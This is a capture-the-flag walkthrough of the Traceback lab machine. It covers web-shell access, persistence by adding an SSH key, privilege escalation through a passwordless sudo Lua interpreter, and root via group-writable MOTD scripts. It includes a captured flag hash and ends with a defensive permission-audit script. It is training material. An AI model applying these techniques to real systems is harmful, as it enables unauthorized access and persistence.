TL;DR: finding and abusing a PHP webshell to get system access, then EoP to
another user via Lua (sudo) and finally EoP to root through a MOTD partial script.
```
# Nmap 7.80 scan initiated Sun Mar 15 16:33:24 2020 as: nmap -sSCV -p 80,22 -oA nmap_services 10.10.10.181
Nmap scan report for 10.10.10.181
Host is up (0.025s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 15 16:35:12 2020 -- 1 IP address (1 host up) scanned in 108.17 seconds
```
```html
<h1>This site has been owned</h1>
<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
<h3> - Xh4H - </h3>
<!--Some of the best web shells that you might need ;)-->
```
The challenge's author is Xh4H. On their GitHub profile we find a project named Web-Shells
that stores some common and some more exotic PHP web shells.
```
webadmin@traceback:/var/www/html $ ls -lhRA /home
/home:
total 8.0K
drwxr-x--- 5 sysadmin sysadmin 4.0K Mar 15 09:07 sysadmin
drwxr-x--- 5 webadmin sysadmin 4.0K Mar 15 09:08 webadmin
ls: cannot open directory '/home/sysadmin': Permission denied

/home/webadmin:
total 4.3M
-rw------- 1 webadmin webadmin   90 Feb 27 05:53 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3.7K Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4.0K Aug 23  2019 .cache
drwxrwxr-x 3 webadmin webadmin 4.0K Aug 24  2019 .local
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4.0K Feb 27 06:29 .ssh
-rwxrw-r-- 1 webadmin webadmin  870 Mar 15 09:05 cc.lua
-rwxrw-r-- 1 webadmin webadmin  332 Mar 15 09:02 ccc.lua
-rw-rw-rw- 1 webadmin webadmin  672 Mar 15 08:49 heli.lua
-rw-r--r-- 1 webadmin webadmin  672 Mar 15 09:04 krisis.lua
-rwxrwxr-x 1 sysadmin sysadmin 4.2M Aug 24  2019 luvit
-rw-rw-r-- 1 webadmin webadmin   89 Aug 24  2019 note.txt
-rw-r--r-- 1 webadmin webadmin  654 Mar 15 09:02 nowy.lua
-rw-rw-r-- 1 webadmin webadmin  648 Mar 15 09:06 privesc.lua
-rw-rw-r-- 1 webadmin webadmin  673 Mar 15 09:03 rs.lua
-rw-r--r-- 1 webadmin webadmin  332 Mar 15 09:02 shell.lua
-rw-r--r-- 1 webadmin webadmin  655 Mar 15 09:08 ssh.lua
-rw-rw-rw- 1 webadmin webadmin   29 Mar 15 09:06 test.lua

/home/webadmin/.cache:
total 0
-rw-r--r-- 1 webadmin webadmin 0 Aug 23  2019 motd.legal-displayed

/home/webadmin/.local:
total 4.0K
drwx------ 3 webadmin webadmin 4.0K Aug 24  2019 share

/home/webadmin/.local/share:
total 4.0K
drwx------ 2 webadmin webadmin 4.0K Aug 24  2019 nano

/home/webadmin/.local/share/nano:
total 0

/home/webadmin/.ssh:
total 4.0K
-rw------- 1 webadmin webadmin 1.7K Mar 15 09:06 authorized_keys
```
```
webadmin@traceback:/var/www/html $ cat /home/webadmin/note.txt
- sysadmin -
I have left this tool to practice Lua.
Contact me if you have any question.
```
We can see a bunch of Lua scripts and a hint telling us to use Lua.
We can edit /home/webadmin/.ssh/authorized_keys and add our public key to gain
persistence and a proper TTY rather than working through the webshell.
```
$ ssh webadmin@10.10.10.181 -i ~/.ssh/id_rsa
The authenticity of host '10.10.10.181 (10.10.10.181)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.181' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H ---------
 - I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Mar 15 09:14:09 2020 from 10.10.15.22
webadmin@traceback:~$
```
With sudo -l we can see that webadmin may run the command luvit as sysadmin without a password:
```
webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/webadmin/luvit
webadmin@traceback:~$ sudo -u sysadmin /home/webadmin/luvit
Welcome to the Luvit repl!
>
```
## Elevation of privilege (EoP): webadmin to sysadmin
luvit is just a wrapper that opens a Lua interpreter, so running it through sudo gives us Lua execution as sysadmin.
From there we can log in as sysadmin over SSH and get the user flag.
```
$ ssh sysadmin@10.10.10.181 -i ~/.ssh/id_rsa
#################################
-------- OWNED BY XH4H ---------
 - I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Mar 15 09:42:11 2020 from 10.10.14.76
$ cat user.txt
c24349701ae38c33ffbf0cceb2c46020
```
We can see that the scripts in the MOTD directory, /etc/update-motd.d, are writable by the sysadmin group.
```
sysadmin@traceback:~$ ls -lh /etc/update-motd.d
total 24K
-rwxrwxr-x 1 root sysadmin  981 Mar 15 10:46 00-header
-rwxrwxr-x 1 root sysadmin  982 Mar 15 10:46 10-help-text
-rwxrwxr-x 1 root sysadmin 4.2K Mar 15 10:46 50-motd-news
-rwxrwxr-x 1 root sysadmin  604 Mar 15 10:46 80-esm
-rwxrwxr-x 1 root sysadmin  299 Mar 15 10:46 91-release-upgrade
```
The scripts are owned by root but group-writable by sysadmin, and pam_motd runs them as root whenever someone logs in, so any command we add to them executes as root.
They seem to be reset fairly often, though, so we run an infinite loop that keeps appending our
reverse shell to /etc/update-motd.d/00-header.
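The listing above is exactly the misconfiguration a host audit should catch: scripts that root executes at login but that a non-root group can edit. The following audit helper is an added example written for this write-up, not code from the box or its author; it assumes GNU coreutils `stat -c` (as on the Ubuntu target) and reports any MOTD partial, or the directory itself, that is group- or world-writable or not owned by root.

```shell
#!/bin/sh
# Added audit helper, not part of the original write-up. Assumes GNU
# coreutils `stat -c` (as on the Ubuntu host). pam_motd runs every script
# in /etc/update-motd.d as root at login, so each one (and the directory
# holding them) must be writable by root only; this reports anything else.

# Print one finding per offending entry in DIR and return 1 if any found.
audit_motd_dir() {
    dir="$1"
    findings=0
    for f in "$dir" "$dir"/*; do
        [ -e "$f" ] || continue          # skip the unmatched glob
        mode=$(stat -c '%a' "$f")        # e.g. 775
        owner=$(stat -c '%U' "$f")       # e.g. root
        # Octal digits 2,3,6,7 carry the write bit: test the group
        # (second-to-last) and other (last) digits of the mode.
        case "$mode" in
            *[2367][0-7]|*[2367])
                echo "WRITABLE mode=$mode owner=$owner $f"
                findings=$((findings + 1)) ;;
        esac
        if [ "$owner" != root ]; then
            echo "OWNER mode=$mode owner=$owner $f"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Remediation for the listing in the write-up: give the directory and its
# scripts back to root with the stock 0755 permissions (must run as root).
fix_motd_dir() {
    dir="$1"
    chown root:root "$dir" "$dir"/* && chmod 0755 "$dir" "$dir"/*
}

# Usage: sh motd_audit.sh /etc/update-motd.d
if [ "$#" -gt 0 ]; then
    audit_motd_dir "$1" || echo "FAIL: $1 contains entries a non-root user can change"
fi
```

On the Traceback host every script would be reported as WRITABLE mode=775 owner=root, which is the finding that leads to the root shell described above.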